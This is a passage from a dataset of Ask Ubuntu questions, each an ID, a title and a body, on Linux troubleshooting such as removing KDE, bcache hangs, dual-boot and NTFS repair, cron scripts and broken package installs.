libqca2-plugin-ossl libqgpgme1 libqimageblitz4 libqjson0 libqrencode3 libqt4-designer libqt4-help libqt4-qt3support libqt4-scripttools libqt4-sql-mysql libqt4-test libqtassistantclient4 libqtglib-2.0-0 libqtgstreamer-0.10-0 libqtscript4-core libqtscript4-gui libqtscript4-network libqtscript4-sql libqtscript4-uitools libqtscript4-xml libqtwebkit4 libreoffice-kde libreoffice-style-oxygen libsocket6-perl libsolid4 libsolidcontrol4abi2 libsolidcontrolifaces4abi2 libsoprano4 libstreamanalyzer0 libstreams0 libsyndication4 libtag-extras1 libtaskmanager4abi3 libtemplateparser4 libthreadweaver4 libtimedate-perl liburi-perl libvirtodbc0 libweather-ion6 libwww-perl libwww-robotrules-perl libxml2-utils libxss1 libzip2 muon muon-installer muon-notifier muon-updater mysql-client-core-5.5 mysql-common mysql-server-core-5.5 ntrack-module-libnl-0 odbcinst odbcinst1debian2 okular okular-extra-backends oxygen-cursor-theme oxygen-icon-theme partitionmanager phonon phonon-backend-gstreamer pinentry-gtk2 pinentry-qt4 plasma-dataengines-addons plasma-dataengines-workspace plasma-desktop plasma-netbook plasma-scriptengine-javascript plasma-scriptengine-python plasma-widget-facebook plasma-widget-folderview plasma-widget-kimpanel plasma-widget-menubar plasma-widget-message-indicator plasma-widget-networkmanagement plasma-widgets-addons plasma-widgets-workspace plymouth-theme-kubuntu-logo plymouth-theme-kubuntu-text polkit-kde-1 printer-applet python-kde4 python-pyudev python-qt4 python-qt4-dbus python-sip qapt-batch qapt-deb-installer quassel quassel-data rekonq sgml-data shared-desktop-ontologies software-properties-kde soprano-daemon system-config-printer-kde systemsettings tasks-icons update-manager-kde usb-creator-kde userconfig virtuoso-minimal virtuoso-opensource-6.1-bin virtuoso-opensource-6.1-common xsettings-kde & & sudo apt-get install ubuntu-desktop but nothing worked , everything ended up with a error like this reading package lists ... done building dependency tree reading state information ... done note , selecting 'ubuntu-drivers-common ' instead of 'jockey-kde' package 'kde-config-touchpad ' is not installed , so not removed package 'kubuntu-firefox-installer ' is not installed , so not removed package 'libkdgantt2 ' is not installed , so not removed package 'libmuonprivate1 ' is not installed , so not removed package 'system-config-printer-kde ' is not installed , so not removed package 'tasks-icons ' is not installed , so not removed e : unable to locate package kde-config-gtk e : unable to locate package kdepim-strigi-plugins e : unable to locate package kvkbd e : unable to locate package language-selector-kde e : unable to locate package libattica0.3 e : could n't find any package by regex 'libattica0.3' e : unable to locate package libboost-program-options1.46.1 e : could n't find any package by regex 'libboost-program-options1.46.1' e : unable to locate package libclucene0ldbl e : unable to locate package libkdecorations4 e : unable to locate package libkdegames5a e : unable to locate package libkexiv2-10 e : unable to locate package libkipi8 e : unable to locate package libktorrent3 e : unable to locate package libkwineffects1abi3 e : unable to locate package libkwinglutils1 e : unable to locate package libkwinnvidiahack4 e : unable to locate package libkworkspace4abi1 e : unable to locate package liblastfm0 e : unable to locate package libnepomukdatamanagement4 e : unable to locate package libnepomuksync4 e : unable to locate package libokularcore1abi1 e : unable to locate package libotr2 e : unable to locate package libplasmaclock4abi3 e : unable to locate package libpoppler-qt4-3 e : unable to locate package libqapt-runtime e : unable to locate package libqapt1 e : unable to locate package libsolidcontrol4abi2 e : unable to locate package libsolidcontrolifaces4abi2 e : unable to locate package libtaskmanager4abi3 e : unable to locate package printer-applet e : unable to locate package userconfig is there any way that works fine on removing kde desktop ! please be kind enough to help . thanks
477629	find out which desktop environment is used via shell ?	is there a way to find out the current desktop environment ( gnome 3 / unity / kde / gnome session flashback ) is currently used via the shell ?
477631	bcache hangs on ubuntu 14.04	i successfully setup my system to use bache in /home partition ( 200gb ssd partition as cache for 500 gb hdd partition ) . however , i keep receiving these messages : info : task bcache_writebac:222 blocked for more than 120 seconds . tainted : pf o 3.13.0-24-generic # 47-ubuntu '' echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . bcache_writebac d ffff88021fc94440 0 222 2 0x00000000 ffff88003623feb8 0000000000000002 ffff880035e097f0 ffff88003623ffd8 0000000000014440 0000000000014440 ffff880035e097f0 ffff880210341d80 ffff880035e10000 ffffffffa00be840 0000000000000000 0000000000000000 call trace : [ < ffffffffa00be840 > ] ? read_dirty+0x400/0x400 [ bcache ] [ < ffffffff81719ee9 > ] schedule+0x29/0x70 [ < ffffffff8108b2ed > ] kthread+0xad/0xf0 [ < ffffffff8108b240 > ] ? kthread_create_on_node+0x1d0/0x1d0 [ < ffffffff817263fc > ] ret_from_fork+0x7c/0xb0 [ < ffffffff8108b240 > ] ? kthread_create_on_node+0x1d0/0x1d0 besides my feat its causing my some data loss , it seems to be preventing me to have a clear shut down .
477633	how can i run a mac program on ubuntu ?	occasionally i would like to run a program made for mac on ubuntu ( example : dash ) . what software can i use to run a single mac program , like i 'm able to do with wine ? i like the convenience of playonlinux - sometimes you need specific settings or specific wine version to run your windows program , and playonlinux makes it easy to provide this on per-program basis . then you can make a desktop icon that looks and works as a native application . is there anything similar i can use for mac programs in ubuntu ?
477634	install kubuntu with btrfs	i do n't have much space on the hard drive , so i was considering using btrfs for my hard drive . i 'm aware that btrfs is not stable yet , but i 'm interested in installing kubuntu with it anyway . how can i install kubuntu using btrfs partition ? i would prefer a solution that does n't require me to change the partition format after installation . i 've read https : //help.ubuntu.com/community/btrfs , but it was last edited two releases ago , and i 'm not sure if the content applies to ubuntu 14.04 .
477638	perrmision denied after /etc/profile while installing java	i am trying to install java . i have to reload my system wide path /etc/profile by typing the following command : /etc/profile and then i get the error : bash : /etc/profile : permission denied why do i get this and how do i fix it ? can i fix it opening another terminal window ? will my installation complete if i reboot computer ? ( if it is needed to fix this problem )
477640	howto restore windows bootloader after removing ubuntu ?	i have installed ubuntu 14.04 and windows 7 with dual boot.now the problem is my ubuntu was crash so i delete the ubuntu partition in windows diskmanagement but the default boot priority is ubuntu now i can not open my windows operating system . is there any way to change the boot priority ? if so how to do that ?
477642	vmware install on ubuntu 14.04	i downloaded vmware-wokstation-full-9.0.2-1031769.x86_64.deb and tried to install it on ubuntu 14.04 by : 'sh vmware-wokstation-full-9.0.2-1031769.x86_64.deb ' but i got the following result `` sh : 0 : ca n't open vmware-wokstation-full-9.0.2-1031769.x86_64.deb '' . also i tried to install it by open the downloaded file with the software center but it also did n't work .
477647	unable to boot windows 7 , though the ntfs partition is accessible	i have a dual boot laptop ( ubuntu 12.04.4/windows 7 ) with a failing hard disk . s.m.a.r.t . current pending sector count has started to rise and the system takes a few minutes to boot in both ubuntu and windows . i replaced the disk with another one with the same capacity ( 750gb ) and tried to transfer everything to the new disk using dd command . ubuntu ( logical ) partition has disappeared and its previously occupied space now appears as raw space inside the extended partition . i decided to reinstall ubuntu ( 14.04 ) and it works fine , except that it does not offer the choice to dual boot in windows 7 anymore . during installation , it said there was no other os found . strangely , the ntfs partition is there , it mounts in ubuntu and the files can be accessed . during the hard disk cloning there were several errors , but the first error was some 28gb from the start of the windows partition , so i guess it could n't have done some critical damage to the filesystem . below is the output of some utilities i tried : sudo fdisk -l disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x677f9038 device boot start end blocks id system /dev/sda1 * 2048 411647 204800 7 hpfs/ntfs/exfat /dev/sda2 411648 314984447 157286400 7 hpfs/ntfs/exfat /dev/sda3 314984448 1434222591 559619072 f w95 ext 'd ( lba ) /dev/sda4 1434222592 1465149167 15463288 12 compaq diagnostics /dev/sda5 314986496 323375103 4194304 82 linux swap / solaris /dev/sda6 323377152 637949951 157286400 83 linux the windows 7 partition is /dev/sda2 . there is an exclamation mark to it in gparted tool and the following information is provided : unable to read the contents of this file system ! because of this some operations may be unavailable . the cause might be a missing software package . the following list of software packages is required for ntfs file syste support : ntfsprogs / ntfs-3g . testdisk utility reports a heads/cylinder mismatch ( the replacement hdd was a different model ) : disk /dev/sda - 750 gb / 698 gib - chs 91201 255 63 current partition structure : partition start end size in sectors warning : number of heads/cylinder mismatches 16 ( ntfs ) ! = 255 ( hd ) 1 * hpfs - ntfs 0 32 33 25 159 6 409600 bad relative sector . warning : number of heads/cylinder mismatches 16 ( ntfs ) ! = 255 ( hd ) 2 p hpfs - ntfs 25 159 7 19606 223 9 314572800 bad relative sector . 3 e extended lba 19606 223 10 89276 57 61 1119238144 4 p compaq diagnostics 89276 57 62 91201 80 63 30926576 5 l linux swap 19607 0 42 20129 43 10 8388608 x extended 20129 65 1 39710 139 45 314573472 6 l linux 20129 75 43 39710 139 45 314572800 i also tried ntfsfix , but without writing anything : ntfsfix -n /dev/sda2 mounting volume ... ok processing of $ mft and $ mftmirr completed successfully . checking the alternate boot sector ... bad error : failed to fix the alternate boot sector and finally ntfsresize : ntfsresize -- info -- force -- no-progress-bar /dev/sda2 ntfsresize v2013.1.13ar.1 ( libntfs-3g ) device name : /dev/sda2 ntfs volume version : 3.1 cluster size : 4096 bytes current volume size : 161061270016 bytes ( 161062 mb ) current device size : 161061273600 bytes ( 161062 mb ) checking filesystem consistency ... inode is corrupt ( 15996 ) : input/output error inode is corrupt ( 16000 ) : input/output error inode is corrupt ( 16001 ) : input/output error inode is corrupt ( 16003 ) : input/output error inode is corrupt ( 16007 ) : input/output error inode is corrupt ( 16008 ) : input/output error inode is corrupt ( 16009 ) : input/output error inode is corrupt ( 16010 ) : input/output error inode is corrupt ( 16012 ) : input/output error inode is corrupt ( 16014 ) : input/output error inode is corrupt ( 16015 ) : input/output error inode is corrupt ( 16016 ) : input/output error inode is corrupt ( 16017 ) : input/output error inode is corrupt ( 16019 ) : input/output error inode is corrupt ( 16020 ) : input/output error found stale mft reference in attribute list ! inode is corrupt ( 16021 ) : input/output error inode is corrupt ( 16022 ) : input/output error inode is corrupt ( 16023 ) : input/output error inode is corrupt ( 16038 ) : input/output error inode is corrupt ( 83920 ) : input/output error inode is corrupt ( 171988 ) : input/output error inode is corrupt ( 172451 ) : input/output error accounting clusters ... cluster accounting failed at 118054 ( 0x1cd26 ) : extra cluster in $ bitmap cluster accounting failed at 118055 ( 0x1cd27 ) : extra cluster in $ bitmap cluster accounting failed at 118056 ( 0x1cd28 ) : extra cluster in $ bitmap cluster accounting failed at 118057 ( 0x1cd29 ) : extra cluster in $ bitmap cluster accounting failed at 118058 ( 0x1cd2a ) : extra cluster in $ bitmap cluster accounting failed at 118059 ( 0x1cd2b ) : extra cluster in $ bitmap cluster accounting failed at 118060 ( 0x1cd2c ) : extra cluster in $ bitmap cluster accounting failed at 118061 ( 0x1cd2d ) : extra cluster in $ bitmap cluster accounting failed at 118062 ( 0x1cd2e ) : extra cluster in $ bitmap cluster accounting failed at 118063 ( 0x1cd2f ) : extra cluster in $ bitmap filesystem check failed ! totally 426 cluster accounting mismatches . error : ntfs is inconsistent . run chkdsk /f on windows then reboot it twice ! the usage of the /f parameter is very important ! no modification was and will be made to ntfs by this software until it gets repaired . what is the safest method to repair the partition and make the system dual-bootable again ? i do n't have a windows 7 dvd , as my laptop came with a small hidden partition at the end of the disk which could be used to restore everything in case of failure , but now is severely damaged .
477648	no sound output to usb headset	control centre then sound then alsamixer then f6 and option 2 is my plantronics headset . i choose it but nothing seems to work i am on new install of lxle v12.04.4 32bit all works fine in windows xp i am a complete novice to ubuntu so all help/advise appreciated ron
477649	power off bluetooth : the led indicator is still on , is the radio module turned off ?	i would like to have a bluetooth adapter powered off at the startup , but at the same time to be able to turn it on when i need it . i have found this advice : add rfkill block bluetooth into /etc/rc.local before exit 0 command . this delivered the desired result in gnome ( at dell d630 with ubuntu 14.04 ) and now , when i need to turn power on at bluetooth i just open system tools- > preferences- > bluetooth and i can enable it in there easily . now i want do the same in kde ( at dell e6410 kubuntu 14.04 ) . however , if i patch the file as above i am not able to turn bluetooth on any more during the working session , the icon disappears and even error message is hanging in a proper window until cold power cycle . and nevertheless there is place to ( un ) tick 'powered ' in tool configuring bluetooth - > configuring bluetooth adpaters , please see this screenshot below . i would like not to have this ticked at the startup . how to do that ? i have not found setting which specifies this in any kde tool , that 's why my question is : how to the same what untick 'powered ' does but from the command line ? then i could add such a string to , say , /etc/rc.local . the direct answer i did not get yet . finally i got a really works for me thing by doing what is maco 's answer in this rich thread , how can i deactivate bluetooth on system startup ? to disable the bluetooth driver from loading on startup : sudo $ editor /etc/modprobe.d/blacklist.conf add : blacklist btusb enabling it later should just be : sudo modprobe btusb okay , that 's what i wanted to do - run it again , on the go , without reset . unfortunately namely this method is keeping my led bluetooth indicator ( at physical panel ) is turning on , which confuses me , whether it 's powered or not ? but the most important question for me is - does this turns off the radio module itself ? i would like to have no any radiation from the bluetooth when it is turned off at startup by any means . if it 's doable please point out by what approach . thanks .
477650	create read only user and grant ssh access	i need to create read-only users and make it available for them to ssh with that user name : groupadd -g 5000 rouser useradd -u 5000 -g 5000 -md /home/rouser -c `` strongview linux user '' -s /bin/bash rouser passwd rouser is this enough ? do i need to add more info or edit visudo file ? i also noticed that i can log in to their accounts if i have sudo access .
477651	kvm not installed ?	when i run virt-manager , and click on the icon to create a new virtual machine , i get an error that kvm is not installed or is not loaded . i use ubuntu gnome 14.04 all qemu packages are version 2.0.0+dfsg-2ubuntu1 qemu-kvm and many other qemu packages installed ... libvirt packages : 1.2.2-0ubuntu13.1 libvirt0 libvirt-bin libvirt-doc python-libvirt virt-manager 0.9.5-1ubuntu3 when i open terminal and enter lsmod | grep kvm i get nothing returned . no lines showing kvm or kvm_amd and no error of any kind . hardware : tyan s2877 with dual opteron 285s i have the latest bios and do n't see any setting in there to turn virtualization on or off . when i run sudo apt-get -s install qemu-kvm here are the results : reading package lists ... done building dependency tree reading state information ... done qemu-kvm is already the newest version . the following packages were automatically installed and are no longer required : kde-l10n-engb libgtk2-gladexml-perl libqt4-test libvncserver0 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . @ jobin : the problem was my hardware . i just bought it a few months ago , although obviously used lol
477652	chrome becomes ugly after updating kubuntu 14.04	i recently updated my kubuntu 14.04 using muon , i guess it did some updates for plasma ( again i guess , i am not sure ) but after that chrome looks terrible . fonts are screwed up , the right click window looks like it did in windows 95 or 98 . the bookmarks dropdown does not scroll , i have to use the down arrow key to reach for the bottom entries . the whole color scheme looks terrible too . here is a screenshot i know it looks photoshoped but its not . this is how it looks at my system . any idea what might have gone wrong ?
477654	why do i have to use 'exportfs -a ' always to mount nfs ?	i have my ubuntu system and a raspberry pi , which access ubuntu via nfs . for some reason , i always have to use 'exportfs -a ' in ubuntu , or else the raspberry will not be able to mount ( shows mount.nfs : mount system call failed ) . is there something wrong with my nfs ?
477655	ubuntu sudo su and server su clarification	i have a question about root . when i want to change to root in ubuntu have to type : sudo su - i am not allowed to type : su and su - root howerver it works the other way around on my server , what difference is there between those 2 commands ?
477658	system crash after attempted upgrade to 12.10 from 12.04	i have a lenovo 3000 j series that was running ubuntu 12.04 . i wanted to upgrade to the most recent supported version of ubuntu , but read that i need to do so one step at a time and that the first step would be from 12.04 to 12.10 . i followed the instructions from this website : and launched the update manager . i clicked through everything and reached the end when the computer was to restart . when it did , it began normally with messages like `` verifying pool '' , but then after it displayed `` ubuntu '' and said `` checking '' , the screen started to flash . there was no more text , nothing for me to select . i let this go on for several minutes until i forced the computer to shut down . i restarted it a few more times but got the same result . how can i get this computer working again ? ideally i 'd like to get to the most recent , most stable version of ubuntu , but anything that works would be an improvement . thank you !
477660	dell inspiron 3537 keyboard and touchpad	with new dell inspiron 3537 keyboard works fine with livecd . everything stable . touchpad do n't works at all but this is not big deal because i have external mouse . but when i install system on disk and reboot i ca n't event pass my password to account . keyboard suspend on second lub some char and repeat ( example peteeeeeeeeeeee - stuck on e ) . i try linux mint ( 13 , 15 , 17 ) , ubuntu ( 12.04 , 14.04 ) , fedora - always the same work only on livecd . ca n't find any solution . sometimes not suspend on key but only freeze . whatever i press it 's response .
477663	how to remove images from a pdf file	i 've got a rather large ( ~100mo ) pdf document with lots of images in it ( as illustrations and background images ) , and i 'd like to have a copy of that pdf without images but i ca n't find out how to do that . i 'm not talking about converting it to text only , i 'd like to keep paragraphs/tables/multi-columns as they are . i 'm comfortable with command line and have several computers with different distributions that i can use .
477666	install ubuntu on mac os x mavericks , macbook air	i was wondering if its okay to install ubuntu on my macbook air , and if it is okay please let me know the procedure . i would prefer to do it by not using refind ( not sure what the name is ) . the following is my system specification . hardware overview : model name : macbook air model identifier : macbookair6,2 processor name : intel core i5 processor speed : 1.3 ghz number of processors : 1 total number of cores : 2 l2 cache ( per core ) : 256 kb l3 cache : 3 mb memory : 8 gb system software overview : system version : os x 10.9.2 ( 13c1021 ) kernel version : darwin 13.1.0 boot volume : macintosh hd boot mode : normal macbook air ( 13-inch mid 2013 ) , os x mavericks ( 10.9.2 )
477672	installing xvst on ubuntu 14.04 ? ffmpeg missing	i 'm trying to install xvst : http : //xviservicethief.sourceforge.net on my ubuntu 14.04 64bits i have tried adding the repositories as described over here : http : //linuxaria.com/article/download-your-favorite-video-with-xvideoservicethief or using the deb from the getdeb link on main site ( download page ) . however both methods complain that ffmpeg is missing . and when looking for ffmpeg it seems like it has been replaced by another package and that the previous ffmpeg is actually something else anyway so better compile it . i 'm confused to as what would be the best way to go for installing xvst . so , for an newbie , how would should i go about installing xvst , and i really hope i do n't have to compile any packages myself ( unless the step by step would be idiot proof ) most grateful for any help !
477677	bash script runs fine , but not in cron	i have a script that 's supposed to record a shoutcast stream for an hour , convert it to mp3 , and then save it . the script runs correctly when i run it from the terminal , but i ca n't seem to get it to run in cron ( where it should run every hour at the top of the hour ) . here 's the line in crontab : 0 * * * * /medialib/tech/bin/recordstream 2 > & 1 > > /medialib/tech/cron.log and here 's the script : # ! /bin/bash name= '' $ ( date + % s ) '' mp3_name= $ name.mp3 wav_name= $ name.wav timeout -shup 60m vlc -i dummy -- sout `` # transcode { channels=2 } : std { access=file , mux=wav , dst=/medialib/stream_backup/wav/ $ wav_name '' /medialib/tech/lib/listen.m3u lame -- mp3input /medialib/stream_backup/wav/ $ wav_name /medialib/stream_backup/ $ mp3_name rm /medialib/stream_backup/wav/ $ wav_name thank you ! edit : contents of cron.log ( this text has been in the log file since it was transferred from an old server where it was working ) . vlc media player 2.0.8 twoflower command line interface initialized . type `help ' for help . > shutting down . vlc media player 2.0.8 twoflower command line interface initialized . type `help ' for help . > shutting down .
477680	arranging url shortcut prompts to copy and other weird stuff	on my desktop , whenever i try to move an icon for a url shortcut , my pointer prompts me to `` copy '' the location . whenever i release the mouse button i get a error while copying `` / '' message . i am , literally , unable to move the url shortcut to any location . the shortcut was created by dragging the favicon from firefox onto my desktop . the shortcut is totally functional in delivering the target url ... . i just ca n't move it . gah ! : p watch the craziness in action - > example video
477681	what steps are required to complete upgrade ?	i am attempting to upgrade from 10.04 lts to 12.04.4 . the download appears in download window , i would like direction on what to do next to finish the download / upgrade .
477689	problem with installing .tar file	i 'm using hp probook 4540s ... recently i have installed ubuntu ..i have downloaded the amd raedon driver for the laptop file which extension is .tar..as i 'm new in ubuntu i do n't have a clue how to install .tar file..help me out ?
477692	kde controls taking over applications in my unity session	ubuntu 14.04 . i tried out kde now some applications ( firefox and others ) in my unity session have kde controls instead of the proper gtk controls . un-installing kubuntu-desktop does not help .
477693	how can we add arch specific conflicts tag when building .deb package ?	we are trying to build multi-arch supported i386 .deb package . there are two .deb packages build on i386 x1 & x2 ( x2 is a subset of x1 binaries ) . x1 < - > x2 conflict each other when installing . only one .deb package can be installed at any instance . we similarly have binaries on xa64 arch . again on xa64 , there are two .deb packages x1 & x2 ( x2 is a subset of x1 binaries ) . x1 < - > x2 conflict each other when installing . only one .deb package can be installed at any instance . in case of multi-arch i386 .deb package , i386 .deb packages ( x1 & x2 ) can be installed on xa64 along side with 64bit ( x1 & x2 ) however i see that when installing x1 : i386 & x1 : amd64 can co-exist however , it throws conflict error when trying to install x1 : i386 & x2 : amd64 in short , can we mark package to conflict based on arch conflict : x2 : i386 x1 : i386 package should only conflict with x2 : i386 & allow other packages to co-exist x1 : amd64 package should only conflict with x2 : amd64 & allow other packages to co-exist x1 : i386 can co-exist with x1 : amd64 or x2 : amd64 x2 : i386 can co-exist with x1 : amd64 or x2 : amd64 thanks for your reply
477699	switch from normal to lts release	we started with an ubuntu 11.10 for a server system . the upgrade to 12.04 went smoothly . now i only want to upgrade to the next lts release . however , the system keeps telling me that 12.10 is available . although this is true , i want to stick to lts from now on . how do i switch the release- '' mode '' ? i want the system to act like i installed it from an lts-image . update after logging into the system i am greeted by welcome to ubuntu 12.04.4 lts ( gnu/linux 3.2.0-63-generic x86_64 ) * documentation : https : //help.ubuntu.com/ new release '12.10 ' available . run 'do-release-upgrade ' to upgrade to it . the file /etc/update-manager/release-upgrades has prompt=lts configured .
477700	-ln links to wrong file	i 've just installed matlab and want to be able to call it from the terminal . it works fine when i explicitly call it from its directory . i cd to /usr/local/bin and type sudo ln -s /usr/local/matlab/r2012a/bin/matlab matlab when i then type `` matlab '' in the terminal , i get the error message `` bash : /media/os/matlab/bin/matlab : no such file or directory '' i have no idea why it 's trying to call matlab from /media . i 've tried deleting the file from usr/local/bin but when i create it again the same thing happens . any help would be very much appreciated . edit : i have discovered the problem : in a previous install i had added the line alias matlab= '' /media/os/matlab/bin/matlab '' to my bashrc file . this has been changed to the correct directory and the problem has been fixed .
477704	info @ wl_cfg80211_attach : registered cfg80211 ph	after bios starup ubuntu purple colour is displayed after that this one line message is `` info @ wl_cfg80211_attach : registered cfg80211 ph '' displayed ... please tell me how fix this problem
477712	archive manager 14.01 wont load pc game software	i 'm trying to install a game using the cdrom drive ( a disc ) and its reading the cdrom/dvd/ yet when i attempt to click on the setup.exe file , the archive manager says , `` loading fail '' when running a setup.exe file . i 'm not that computer literate ( novice in program installations ) yet if someone would explain whats missing or what i need to do in simple terms , i would greatly appreciate it . i have just installed ubuntu 14.01
477713	how can i play another mp3 file without having to close the current playing file in vlc ?	i played a song via terminal . i tried the following and it gave me this result : - siddhartharao17 @ siddhartharao-pc : /media/lenovo/music/hindi asorted/ek villain $ vlc -- audio galliyan.mp3 vlc media player 2.0.8 twoflower ( revision 2.0.8a-0-g68cf50b ) [ 0x814b908 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` equinox '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` equinox '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` equinox '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` equinox '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` equinox '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` equinox '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` equinox '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` equinox '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` equinox '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` equinox '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` equinox '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` equinox '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` equinox '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` equinox '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` equinox '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` equinox '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( vlc:4731 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , now , the query i have is , if i want to change the song from the same terminal ( without opening a new one ) , how to do it ? i have been searching , googling , also tried reading the `` vlc -- help '' , but it di n't help me . i believe i 'll get my answer here . than you in advance : )
477714	is it possible to print multiple ( and different ) photos from shotwell ?	i know how to print multiple instances of the same photo , but i need to print 4 different pictures on one sheet . does this functionality exist ? thanks a lot ! g .
477718	how do i split a multi-page tif file ?	i have big 100+ page tif files and would like to be able to split it at a specified page . there are excellent tools for doing this with pdfs . i 'm looking for something similar for tif images , both gui and command line solutions .
477721	package management system corrupted . can not install or remove packages . u12.04lts	having read other posts , i believe that this may be less about samba than about update system . below is the log file of the failed installation of samba . i have been trying without success to install/outstall samba so that i could install anything else ... i can not either install or remove samba using either update-manager or apt-get ( nor indeed software centre ) . one of the errors that i have had to correct is the presence after `` removal '' ( failed ) of /usr/share/system-config-samba directory which finally allowed itself to be deleted . that , however was then ... i have u12.04lts . running on release 63 because i allowed the upgrade to 64 this morning which fell over - no output to monitor - obviously even less support for my graphic chip than i am suffering already ( see other posts in this forum ) . according to my interpretation of the dpkg returned errors there may be some problem with the package files , but if this is the case then it is on servers 'main ' , 'nantes uni fr ' and 'best fr ' at the very least if not everywhere . the suggestions offered at package operation failed and elsewhere have not worked for me . this linked post suggests that a similar error is present in other packages , or that the error is in the 'update system' i have tried ... sudo apt-get remove samba ... autoremove ... install samba ... clean ... update -f all of the above in update-manager i have tried the `` reload packages list '' which fails to terminate because of the error . i have tried to install and remove samba from the software centre ... : ( i am at a loss ... i need help , please ! firstly to recover my apt-get/update-manager/software centre so that i can at least carry on with my continuing installation - up to communicating with home network hence need for samba - which brings me to my second requirement ... samba . ps is the issue about `` maxreports '' associated or apart ? thanks for any and all help ! ! installarchives ( ) failed : preconfiguring packages ... ... snip ( reading database ... ... snip ( reading database ... 184858 files and directories currently installed . ) unpacking samba ( from ... /samba_2 % 3a3.6.3-2ubuntu2.10_i386.deb ) ... dpkg-deb ( subprocess ) : data : internal gzip read error : ' : data error' dpkg-deb : error : subprocess returned error exit status 2 dpkg : error processing /var/cache/apt/archives/samba_2 % 3a3.6.3-2ubuntu2.10_i386.deb ( -- unpack ) : subprocess dpkg-deb -- fsys-tarfile returned error exit status 2 no apport report written because maxreports is reached already selecting previously unselected package system-config-samba . unpacking system-config-samba ( from ... /system-config-samba_1.2.63-0ubuntu5_all.deb ) ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot processing triggers for ufw ... processing triggers for man-db ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... errors were encountered while processing : /var/cache/apt/archives/samba_2 % 3a3.6.3-2ubuntu2.10_i386.deb error in function : dpkg : dependency problems prevent configuration of system-config-samba : system-config-samba depends on samba ; however : package samba is not installed . dpkg : error processing system-config-samba ( -- configure ) : dependency problems - leaving unconfigured update after failed chromium-browser install yesterday i got an update of chromium-browser in update-manager . this errored too but following the instructions everything ( everything ! ! ) cleared up - have finished install of wine and samba . i can not use chrome due to my graphics card problem no doubt , but i shall pursue that elsewhere . too the problem with 3.2.0-64-generic-pae has not gone away but again , elsewhere ...
477722	compiz rotate to cube face with window problem	i am using ubuntu 12.04.3 on my toshiba laptop right now . i have installed compiz and enabled cube and certain features of it . i have problem with rotate to cube face with window . when i try to switch desktops with the key combination : `` ctrl+alt+shift+arrow keys '' at first window seems to carried but it does not . is it something to do with my graphics card or is it a problem about compiz ? i have browsed through internet but i was not able to find a solution .
477725	grub rescue mode error	so i 've messed up my install completely via ignorance . i 'd had windows 8 pro and ubuntu 14 , which i installed using unetbootin and a usb , running on partitions on my hard drive , then realised i do n't use ubuntu 14 anymore . i deleted the partition it was on , and re-formatted it as an exfat partition . now , whenever i turn on my computer , a command line interface appears saying : error : unknown filesystem entering rescue mode ... grub rescue > i have attempted to use a windows install disk , and a windows install usb , however both of these attempts failed and i was sent straight back to the command line screen . a common suggestion i saw on the internet was to do : ls hd0 and find the windows install from there . however , i have tried this on all 5 of the displayed partitions , and they all come up with the same error : error : unknown filesystem . how on earth do i fix this ?
